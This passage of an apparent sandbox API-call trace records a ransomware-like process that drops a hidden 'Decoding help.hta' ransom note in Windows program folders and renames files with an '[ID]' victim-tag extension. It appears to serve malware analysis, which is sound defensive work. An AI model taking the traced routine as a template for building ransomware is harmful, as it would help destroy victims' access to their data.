57 [0040.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" [0040.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\decoding help.hta")) returned 0xffffffff [0040.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0040.880] WriteFile (in: hFile=0x344, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa28fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa28fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.881] CloseHandle (hObject=0x344) returned 1 [0040.881] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.300] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ImagingDevices.exe.mui") returned -1 [0041.300] lstrlenW (lpString="ImagingDevices.exe.mui") returned 22 [0041.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0041.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned 57 [0041.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\", lpString2="ImagingDevices.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" [0041.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" [0041.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.300] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0041.300] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0041.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned 57 [0041.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" [0041.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\decoding help.hta")) returned 0x1 [0041.300] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoAcq.dll.mui") returned -1 [0041.300] lstrlenW (lpString="PhotoAcq.dll.mui") returned 16 [0041.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0041.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned 57 [0041.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\", lpString2="PhotoAcq.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" [0041.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" [0041.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.301] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0041.301] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0041.301] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned 57 [0041.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" [0041.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\decoding help.hta")) returned 0x1 [0041.301] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoViewer.dll.mui") returned -1 [0041.301] lstrlenW (lpString="PhotoViewer.dll.mui") returned 19 [0041.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0041.301] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned 57 [0041.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\", lpString2="PhotoViewer.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" [0041.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" [0041.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.301] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 0 [0041.301] FindClose (in: hFindFile=0x5d7ed0 | out: hFindFile=0x5d7ed0) returned 1 Thread: id = 269 os_tid = 0x3c4 [0040.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*", lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8290 [0040.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.891] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.319] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.319] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0041.319] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0041.319] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0041.319] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0041.319] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.320] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.320] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US" [0041.320] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*" [0041.320] GlobalMemoryStatus (in: lpBuffer=0xa14fd10 | out: lpBuffer=0xa14fd10) [0041.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93701e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x34c [0041.328] CloseHandle (hObject=0x34c) returned 1 [0041.328] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688296e7, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x688296e7, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xaf1e3ee0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0041.329] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.329] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.329] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0xffffffff [0041.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0041.338] WriteFile (in: hFile=0x358, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa14fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa14fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.339] CloseHandle (hObject=0x358) returned 1 [0041.339] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.339] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextService.dll") returned -1 [0041.339] lstrlenW (lpString="TableTextService.dll") returned 20 [0041.339] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.339] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.339] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextService.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll" [0041.339] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll" [0041.339] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.339] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservice.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservice.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.340] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x77dccedc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3f54, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceAmharic.txt", cAlternateFileName="")) returned 1 [0041.340] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.340] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.340] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceAmharic.txt") returned -1 [0041.340] lstrlenW (lpString="TableTextServiceAmharic.txt") returned 27 [0041.340] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0041.340] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.340] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceAmharic.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" [0041.340] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" [0041.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.340] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47eeed6d, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47eeed6d, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x77e3f2fc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x136bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceArray.txt", cAlternateFileName="")) returned 1 [0041.340] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.340] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" [0041.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0041.340] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceArray.txt") returned -1 [0041.340] lstrlenW (lpString="TableTextServiceArray.txt") returned 25 [0041.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0041.341] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned 58 [0041.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\", lpString2="TableTextServiceArray.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt" [0041.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt" [0041.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0041.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicearray.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows 